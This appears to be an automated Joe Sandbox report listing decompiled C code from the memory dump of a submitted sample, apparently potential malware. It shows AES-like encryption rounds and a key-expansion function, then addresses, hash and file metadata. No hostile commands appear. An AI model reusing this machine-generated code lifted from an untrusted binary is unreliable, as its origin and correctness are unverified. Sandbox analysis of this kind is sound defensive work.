					_t714 = _t998[2] ^  *(0xf69a240 + (_t712 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t739 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t585 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t516 & 0x000000ff) * 4);
					_t747 = _t998[3] ^  *(0xf69a240 + (_t739 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t513 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t585 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t713 & 0x000000ff) * 4);
					_t1010 =  *_t1179;
					_t518 =  *(0xf69a240 + (_t513 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t515 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t740 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t713 & 0x000000ff) * 4) ^  *_t1010;
					_t594 =  *(0xf69aa40 + (_t740 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t712 & 0x000000ff) * 4) ^  *(0xf69a240 + (_t515 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t516 & 0x000000ff) * 4) ^ _t1010[1];
					_t1011 =  &(_t1010[4]);
					 *_t1179 = _t1011;
					asm("rol ebx, 0x10");
					_t520 = _t518 & 0xffff0000 | _t594 >> 0x00000010;
					_t748 = _t747 >> 0x10;
					_t521 = _t520 >> 0x10;
					_t715 = _t714 >> 0x10;
					_t716 = _t1011[2] ^  *(0xf69a240 + (_t714 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t747 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t594 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t521 & 0x000000ff) * 4);
					_t755 = _t1011[3] ^  *(0xf69a240 + (_t747 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t518 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t594 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t715 & 0x000000ff) * 4);
					_t1023 =  *_t1179;
					_t523 =  *(0xf69a240 + (_t518 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t520 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t748 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t715 & 0x000000ff) * 4) ^  *_t1023;
					_t603 =  *(0xf69aa40 + (_t748 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t714 & 0x000000ff) * 4) ^  *(0xf69a240 + (_t520 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t521 & 0x000000ff) * 4) ^ _t1023[1];
					_t1024 =  &(_t1023[4]);
					 *_t1179 = _t1024;
					asm("rol ebx, 0x10");
					_t525 = _t523 & 0xffff0000 | _t603 >> 0x00000010;
					_t756 = _t755 >> 0x10;
					_t526 = _t525 >> 0x10;
					_t717 = _t716 >> 0x10;
					_t718 = _t1024[2] ^  *(0xf69a240 + (_t716 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t755 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t603 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t526 & 0x000000ff) * 4);
					_t763 = _t1024[3] ^  *(0xf69a240 + (_t755 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t523 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t603 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t717 & 0x000000ff) * 4);
					_t1036 =  *_t1179;
					_t528 =  *(0xf69a240 + (_t523 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t525 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t756 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t717 & 0x000000ff) * 4) ^  *_t1036;
					_t612 =  *(0xf69aa40 + (_t756 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t716 & 0x000000ff) * 4) ^  *(0xf69a240 + (_t525 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t526 & 0x000000ff) * 4) ^ _t1036[1];
					_t1037 =  &(_t1036[4]);
					 *_t1179 = _t1037;
					asm("rol ebx, 0x10");
					_t530 = _t528 & 0xffff0000 | _t612 >> 0x00000010;
					_t764 = _t763 >> 0x10;
					_t531 = _t530 >> 0x10;
					_t719 = _t718 >> 0x10;
					_t720 = _t1037[2] ^  *(0xf69a240 + (_t718 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t763 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t612 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t531 & 0x000000ff) * 4);
					_t771 = _t1037[3] ^  *(0xf69a240 + (_t763 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t528 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t612 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t719 & 0x000000ff) * 4);
					_t1049 =  *_t1179;
					_t533 =  *(0xf69a240 + (_t528 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t530 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t764 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t719 & 0x000000ff) * 4) ^  *_t1049;
					_t621 =  *(0xf69aa40 + (_t764 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t718 & 0x000000ff) * 4) ^  *(0xf69a240 + (_t530 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t531 & 0x000000ff) * 4) ^ _t1049[1];
					_t1050 =  &(_t1049[4]);
					 *_t1179 = _t1050;
					asm("rol ebx, 0x10");
					_t535 = _t533 & 0xffff0000 | _t621 >> 0x00000010;
					_t772 = _t771 >> 0x10;
					_t536 = _t535 >> 0x10;
					_t721 = _t720 >> 0x10;
					_t722 = _t1050[2] ^  *(0xf69a240 + (_t720 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t771 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t621 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t536 & 0x000000ff) * 4);
					_t779 = _t1050[3] ^  *(0xf69a240 + (_t771 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t533 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t621 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t721 & 0x000000ff) * 4);
					_t1062 =  *_t1179;
					_t538 =  *(0xf69a240 + (_t533 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t535 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t772 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t721 & 0x000000ff) * 4) ^  *_t1062;
					_t630 =  *(0xf69aa40 + (_t772 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t720 & 0x000000ff) * 4) ^  *(0xf69a240 + (_t535 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t536 & 0x000000ff) * 4) ^ _t1062[1];
					_t1063 =  &(_t1062[4]);
					 *_t1179 = _t1063;
					asm("rol ebx, 0x10");
					_t540 = _t538 & 0xffff0000 | _t630 >> 0x00000010;
					_t780 = _t779 >> 0x10;
					_t541 = _t540 >> 0x10;
					_t723 = _t722 >> 0x10;
					_t724 = _t1063[2] ^  *(0xf69a240 + (_t722 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t779 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t630 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t541 & 0x000000ff) * 4);
					_t787 = _t1063[3] ^  *(0xf69a240 + (_t779 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t538 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t630 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t723 & 0x000000ff) * 4);
					_t1075 =  *_t1179;
					_t543 =  *(0xf69a240 + (_t538 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t540 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t780 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t723 & 0x000000ff) * 4) ^  *_t1075;
					_t639 =  *(0xf69aa40 + (_t780 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t722 & 0x000000ff) * 4) ^  *(0xf69a240 + (_t540 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t541 & 0x000000ff) * 4) ^ _t1075[1];
					_t1076 =  &(_t1075[4]);
					 *_t1179 = _t1076;
					asm("rol ebx, 0x10");
					_t545 = _t543 & 0xffff0000 | _t639 >> 0x00000010;
					_t788 = _t787 >> 0x10;
					_t546 = _t545 >> 0x10;
					_t725 = _t724 >> 0x10;
					_t726 = _t1076[2] ^  *(0xf69a240 + (_t724 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t787 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t639 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t546 & 0x000000ff) * 4);
					_t795 = _t1076[3] ^  *(0xf69a240 + (_t787 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t543 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t639 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t725 & 0x000000ff) * 4);
					_t1088 =  *_t1179;
					_t548 =  *(0xf69a240 + (_t543 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t545 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t788 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t725 & 0x000000ff) * 4) ^  *_t1088;
					_t648 =  *(0xf69aa40 + (_t788 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t724 & 0x000000ff) * 4) ^  *(0xf69a240 + (_t545 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t546 & 0x000000ff) * 4) ^ _t1088[1];
					_t1089 =  &(_t1088[4]);
					 *_t1179 = _t1089;
					asm("rol ebx, 0x10");
					_t550 = _t548 & 0xffff0000 | _t648 >> 0x00000010;
					_t796 = _t795 >> 0x10;
					_t551 = _t550 >> 0x10;
					_t727 = _t726 >> 0x10;
					_t728 = _t1089[2] ^  *(0xf69a240 + (_t726 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t795 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t648 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t551 & 0x000000ff) * 4);
					_t803 = _t1089[3] ^  *(0xf69a240 + (_t795 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t548 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t648 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t727 & 0x000000ff) * 4);
					_t1101 =  *_t1179;
					_t553 =  *(0xf69a240 + (_t548 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t550 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t796 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t727 & 0x000000ff) * 4) ^  *_t1101;
					_t657 =  *(0xf69aa40 + (_t796 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t726 & 0x000000ff) * 4) ^  *(0xf69a240 + (_t550 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t551 & 0x000000ff) * 4) ^ _t1101[1];
					_t1102 =  &(_t1101[4]);
					 *_t1179 = _t1102;
					asm("rol ebx, 0x10");
					_t555 = _t553 & 0xffff0000 | _t657 >> 0x00000010;
					_t804 = _t803 >> 0x10;
					_t556 = _t555 >> 0x10;
					_t729 = _t728 >> 0x10;
					_t730 = _t1102[2] ^  *(0xf69a240 + (_t728 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t803 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t657 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t556 & 0x000000ff) * 4);
					_t811 = _t1102[3] ^  *(0xf69a240 + (_t803 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t553 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t657 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t729 & 0x000000ff) * 4);
					_t1114 =  *_t1179;
					_t558 =  *(0xf69a240 + (_t553 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t555 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t804 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t729 & 0x000000ff) * 4) ^  *_t1114;
					_t666 =  *(0xf69aa40 + (_t804 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t728 & 0x000000ff) * 4) ^  *(0xf69a240 + (_t555 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t556 & 0x000000ff) * 4) ^ _t1114[1];
					_t1115 =  &(_t1114[4]);
					 *_t1179 = _t1115;
					asm("rol ebx, 0x10");
					_t560 = _t558 & 0xffff0000 | _t666 >> 0x00000010;
					_t812 = _t811 >> 0x10;
					_t561 = _t560 >> 0x10;
					_t731 = _t730 >> 0x10;
					_t1127 =  *_t1179;
					_t819 = _t1179[7];
					 *_t819 =  *(0xf69b240 + (_t558 & 0x000000ff) * 4) ^  *(0xf69b640 + (_t560 & 0x000000ff) * 4) ^  *(0xf69be40 + (_t812 & 0x000000ff) * 4) ^  *(0xf69ba40 + (_t731 & 0x000000ff) * 4) ^  *_t1127;
					_t819[1] =  *(0xf69ba40 + (_t812 & 0x000000ff) * 4) ^  *(0xf69b640 + (_t730 & 0x000000ff) * 4) ^  *(0xf69b240 + (_t560 & 0x000000ff) * 4) ^  *(0xf69be40 + (_t561 & 0x000000ff) * 4) ^ _t1127[1];
					_t819[2] = _t1115[2] ^  *(0xf69b240 + (_t730 & 0x000000ff) * 4) ^  *(0xf69b640 + (_t811 & 0x000000ff) * 4) ^  *(0xf69be40 + (_t666 & 0x000000ff) * 4) ^  *(0xf69ba40 + (_t561 & 0x000000ff) * 4);
					_t819[3] = _t1115[3] ^  *(0xf69b240 + (_t811 & 0x000000ff) * 4) ^  *(0xf69b640 + (_t558 & 0x000000ff) * 4) ^  *(0xf69ba40 + (_t666 & 0x000000ff) * 4) ^  *(0xf69be40 + (_t731 & 0x000000ff) * 4);
					_t564 = 0;
				} else {
					if(_t851 == 0xc0) {
						L5:
						_t1129 =  &(_t997[4]);
						 *_t1179 = _t1129;
						asm("rol ebx, 0x10");
						_t566 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
						_t820 = _t739 >> 0x10;
						_t567 = _t566 >> 0x10;
						_t732 = _t712 >> 0x10;
						_t733 = _t1129[2] ^  *(0xf69a240 + (_t712 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t739 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t585 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t567 & 0x000000ff) * 4);
						_t827 = _t1129[3] ^  *(0xf69a240 + (_t739 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t513 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t585 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t732 & 0x000000ff) * 4);
						_t1141 =  *_t1179;
						_t569 =  *(0xf69a240 + (_t513 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t566 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t820 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t732 & 0x000000ff) * 4) ^  *_t1141;
						_t685 =  *(0xf69aa40 + (_t820 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t712 & 0x000000ff) * 4) ^  *(0xf69a240 + (_t566 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t567 & 0x000000ff) * 4) ^ _t1141[1];
						_t1142 =  &(_t1141[4]);
						 *_t1179 = _t1142;
						asm("rol ebx, 0x10");
						_t571 = _t569 & 0xffff0000 | _t685 >> 0x00000010;
						_t828 = _t827 >> 0x10;
						_t572 = _t571 >> 0x10;
						_t734 = _t733 >> 0x10;
						_t712 = _t1142[2] ^  *(0xf69a240 + (_t733 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t827 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t685 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t572 & 0x000000ff) * 4);
						_t739 = _t1142[3] ^  *(0xf69a240 + (_t827 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t569 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t685 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t734 & 0x000000ff) * 4);
						_t997 =  *_t1179;
						_t513 =  *(0xf69a240 + (_t569 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t571 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t828 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t734 & 0x000000ff) * 4) ^  *_t997;
						_t585 =  *(0xf69aa40 + (_t828 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t733 & 0x000000ff) * 4) ^  *(0xf69a240 + (_t571 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t572 & 0x000000ff) * 4) ^ _t997[1];
						goto L6;
					} else {
						if(_t851 == 0xe0) {
							_t1154 =  &(_t997[4]);
							 *_t1179 = _t1154;
							asm("rol ebx, 0x10");
							_t575 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
							_t835 = _t739 >> 0x10;
							_t576 = _t575 >> 0x10;
							_t735 = _t712 >> 0x10;
							_t736 = _t1154[2] ^  *(0xf69a240 + (_t712 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t739 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t585 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t576 & 0x000000ff) * 4);
							_t842 = _t1154[3] ^  *(0xf69a240 + (_t739 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t513 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t585 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t735 & 0x000000ff) * 4);
							_t1166 =  *_t1179;
							_t578 =  *(0xf69a240 + (_t513 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t575 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t835 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t735 & 0x000000ff) * 4) ^  *_t1166;
							_t702 =  *(0xf69aa40 + (_t835 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t712 & 0x000000ff) * 4) ^  *(0xf69a240 + (_t575 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t576 & 0x000000ff) * 4) ^ _t1166[1];
							_t1167 =  &(_t1166[4]);
							 *_t1179 = _t1167;
							asm("rol ebx, 0x10");
							_t580 = _t578 & 0xffff0000 | _t702 >> 0x00000010;
							_t843 = _t842 >> 0x10;
							_t581 = _t580 >> 0x10;
							_t737 = _t736 >> 0x10;
							_t712 = _t1167[2] ^  *(0xf69a240 + (_t736 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t842 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t702 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t581 & 0x000000ff) * 4);
							_t739 = _t1167[3] ^  *(0xf69a240 + (_t842 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t578 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t702 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t737 & 0x000000ff) * 4);
							_t997 =  *_t1179;
							_t513 =  *(0xf69a240 + (_t578 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t580 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t843 & 0x000000ff) * 4) ^  *(0xf69aa40 + (_t737 & 0x000000ff) * 4) ^  *_t997;
							_t585 =  *(0xf69aa40 + (_t843 & 0x000000ff) * 4) ^  *(0xf69a640 + (_t736 & 0x000000ff) * 4) ^  *(0xf69a240 + (_t580 & 0x000000ff) * 4) ^  *(0xf69ae40 + (_t581 & 0x000000ff) * 4) ^ _t997[1];
							goto L5;
						} else {
							_t564 = 0xffffffff;
						}
					}
				}
				return _t564;
			}

0x0f691023
0x0f691027
0x0f69102b
0x0f69102f
0x0f691033
0x0f691042
0x0f691046
0x0f69104d
0x0f691050
0x0f691053
0x0f691056
0x0f69105f
0x0f6913c7
0x0f6913c7
0x0f6913ca
0x0f6913d3
0x0f691424
0x0f691426
0x0f69145b
0x0f69145e
0x0f69148b
0x0f69148d
0x0f69148f
0x0f691492
0x0f691495
0x0f691498
0x0f69149b
0x0f6914a4
0x0f6914f5
0x0f6914f7
0x0f69152c
0x0f69152f
0x0f69155c
0x0f69155e
0x0f691560
0x0f691563
0x0f691566
0x0f691569
0x0f69156c
0x0f691575
0x0f6915c6
0x0f6915c8
0x0f6915fd
0x0f691600
0x0f69162d
0x0f69162f
0x0f691631
0x0f691634
0x0f691637
0x0f69163a
0x0f69163d
0x0f691646
0x0f691697
0x0f691699
0x0f6916ce
0x0f6916d1
0x0f6916fe
0x0f691700
0x0f691702
0x0f691705
0x0f691708
0x0f69170b
0x0f69170e
0x0f691717
0x0f691768
0x0f69176a
0x0f69179f
0x0f6917a2
0x0f6917cf
0x0f6917d1
0x0f6917d3
0x0f6917d6
0x0f6917d9
0x0f6917dc
0x0f6917df
0x0f6917e8
0x0f691839
0x0f69183b
0x0f691870
0x0f691873
0x0f6918a0
0x0f6918a2
0x0f6918a4
0x0f6918a7
0x0f6918aa
0x0f6918ad
0x0f6918b0
0x0f6918b9
0x0f69190a
0x0f69190c
0x0f691941
0x0f691944
0x0f691971
0x0f691973
0x0f691975
0x0f691978
0x0f69197b
0x0f69197e
0x0f691981
0x0f69198a
0x0f6919db
0x0f6919dd
0x0f691a12
0x0f691a15
0x0f691a42
0x0f691a44
0x0f691a46
0x0f691a49
0x0f691a4c
0x0f691a4f
0x0f691a52
0x0f691a5b
0x0f691aac
0x0f691aae
0x0f691ae3
0x0f691ae6
0x0f691b13
0x0f691b15
0x0f691b17
0x0f691b1a
0x0f691b1d
0x0f691b20
0x0f691b23
0x0f691b2c
0x0f691b7d
0x0f691b7f
0x0f691bb4
0x0f691bb7
0x0f691be4
0x0f691bed
0x0f691bf1
0x0f691bf3
0x0f691bf6
0x0f691bf9
0x0f691bfc
0x0f691065
0x0f69106b
0x0f691225
0x0f691225
0x0f691228
0x0f691231
0x0f691282
0x0f691284
0x0f6912b9
0x0f6912bc
0x0f6912e9
0x0f6912eb
0x0f6912ed
0x0f6912f0
0x0f6912f3
0x0f6912f6
0x0f6912f9
0x0f691302
0x0f691353
0x0f691355
0x0f69138a
0x0f69138d
0x0f6913ba
0x0f6913bc
0x0f6913be
0x0f6913c1
0x0f6913c4
0x00000000
0x0f691071
0x0f691077
0x0f691083
0x0f691086
0x0f69108f
0x0f6910e0
0x0f6910e2
0x0f691117
0x0f69111a
0x0f691147
0x0f691149
0x0f69114b
0x0f69114e
0x0f691151
0x0f691154
0x0f691157
0x0f691160
0x0f6911b1
0x0f6911b3
0x0f6911e8
0x0f6911eb
0x0f691218
0x0f69121a
0x0f69121c
0x0f69121f
0x0f691222
0x00000000
0x0f691079
0x0f691079
0x0f691079
0x0f691077
0x0f69106b
0x0f691c11

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5bcb56b8b64ba100faf9e622f0aa9dfd844a1d619bec6f3a3456a90f7d0fcb3
Instruction ID: a48d6140f057620104e639ced1936b32319a3101fa19cfc1b6f2e26c077811b2
Opcode Fuzzy Hash: a5bcb56b8b64ba100faf9e622f0aa9dfd844a1d619bec6f3a3456a90f7d0fcb3
Instruction Fuzzy Hash: 4E620631C082788FDB80DFAEE48403673E6E744333B4E5526AA905B2A5D63D7635BB74

Uniqueness

Uniqueness Score: -1.00%

Function 0F698520 Relevance: .4, Instructions: 395
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0F698520(signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _t274;
				signed int _t284;
				signed int _t287;
				unsigned int _t289;
				intOrPtr _t297;
				signed int _t306;
				signed int _t309;
				unsigned int _t311;
				intOrPtr _t319;
				signed int _t328;
				signed int _t331;
				unsigned int _t333;
				intOrPtr _t341;
				signed int _t350;
				signed int _t353;
				unsigned int _t355;
				intOrPtr _t363;
				signed int _t372;
				signed int _t375;
				unsigned int _t377;
				intOrPtr _t385;
				signed int _t394;
				signed int _t397;
				unsigned int _t399;
				intOrPtr _t407;
				signed int _t416;
				intOrPtr* _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t441;
				intOrPtr _t442;
				signed int _t458;
				intOrPtr _t459;
				signed int _t475;
				intOrPtr _t476;
				signed int _t492;
				intOrPtr _t493;
				signed int _t509;
				intOrPtr _t510;
				signed int _t526;
				intOrPtr _t527;
				signed int _t542;
				signed int _t543;
				signed int _t544;
				signed int _t545;
				signed int _t546;
				signed int _t547;
				signed int _t548;
				signed int _t549;
				signed int _t551;
				signed int _t553;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				intOrPtr _t568;

				_t274 = _a4;
				_t420 = _a8;
				_t428 =  *_t274;
				_v12 = _t428;
				 *_t420 = _t428;
				_t429 =  *((intOrPtr*)(_t274 + 4));
				 *((intOrPtr*)(_t420 + 4)) = _t429;
				_v16 = _t429;
				_t430 =  *((intOrPtr*)(_t274 + 8));
				 *((intOrPtr*)(_t420 + 8)) = _t430;
				_v8 = _t430;
				_t431 =  *((intOrPtr*)(_t274 + 0xc));
				 *((intOrPtr*)(_t420 + 0xc)) = _t431;
				_t543 =  *(_t274 + 0x10);
				 *(_t420 + 0x10) = _t543;
				_t561 =  *(_t274 + 0x14);
				 *(_t420 + 0x14) = _t561;
				_a4 = _t431;
				_t553 =  *(_t274 + 0x18);
				 *(_t420 + 0x18) = _t553;
				_t421 =  *(_t274 + 0x1c);
				 *(_a8 + 0x1c) = _t421;
				_t284 = _v12 ^  *(0xf69ba40 + (_t421 >> 0x18) * 4) ^  *(0xf69b640 + (_t421 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf69b240 + (_t421 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf69be40 + (_t421 & 0x000000ff) * 4) ^  *0xf69a200;
				_v12 = _t284;
				 *(_a8 + 0x20) = _t284;
				_t441 = _v16 ^ _t284;
				_v16 = _t441;
				 *(_a8 + 0x24) = _t441;
				_t287 = _v8 ^ _t441;
				_t442 = _a8;
				_v8 = _t287;
				 *(_t442 + 0x28) = _t287;
				_t289 = _a4 ^ _v8;
				 *(_t442 + 0x2c) = _t289;
				_a4 = _t289;
				_t297 = _a8;
				_t544 = _t543 ^  *(0xf69be40 + (_t289 >> 0x18) * 4) ^  *(0xf69ba40 + (_t289 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf69b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf69b240 + (_a4 & 0x000000ff) * 4);
				_t562 = _t561 ^ _t544;
				_t554 = _t553 ^ _t562;
				_t422 = _t421 ^ _t554;
				 *(_t297 + 0x30) = _t544;
				 *(_t297 + 0x34) = _t562;
				 *(_t297 + 0x38) = _t554;
				 *(_t297 + 0x3c) = _t422;
				_t306 = _v12 ^  *(0xf69ba40 + (_t422 >> 0x18) * 4) ^  *(0xf69b640 + (_t422 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf69b240 + (_t422 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf69be40 + (_t422 & 0x000000ff) * 4) ^  *0xf69a204;
				_v12 = _t306;
				 *(_a8 + 0x40) = _t306;
				_t458 = _v16 ^ _t306;
				_v16 = _t458;
				 *(_a8 + 0x44) = _t458;
				_t309 = _v8 ^ _t458;
				_t459 = _a8;
				_v8 = _t309;
				 *(_t459 + 0x48) = _t309;
				_t311 = _a4 ^ _v8;
				 *(_t459 + 0x4c) = _t311;
				_a4 = _t311;
				_t319 = _a8;
				_t545 = _t544 ^  *(0xf69be40 + (_t311 >> 0x18) * 4) ^  *(0xf69ba40 + (_t311 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf69b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf69b240 + (_a4 & 0x000000ff) * 4);
				_t563 = _t562 ^ _t545;
				_t555 = _t554 ^ _t563;
				_t423 = _t422 ^ _t555;
				 *(_t319 + 0x50) = _t545;
				 *(_t319 + 0x54) = _t563;
				 *(_t319 + 0x58) = _t555;
				 *(_t319 + 0x5c) = _t423;
				_t328 = _v12 ^  *(0xf69ba40 + (_t423 >> 0x18) * 4) ^  *(0xf69b640 + (_t423 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf69b240 + (_t423 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf69be40 + (_t423 & 0x000000ff) * 4) ^  *0xf69a208;
				_v12 = _t328;
				 *(_a8 + 0x60) = _t328;
				_t475 = _v16 ^ _t328;
				_v16 = _t475;
				 *(_a8 + 0x64) = _t475;
				_t331 = _v8 ^ _t475;
				_t476 = _a8;
				_v8 = _t331;
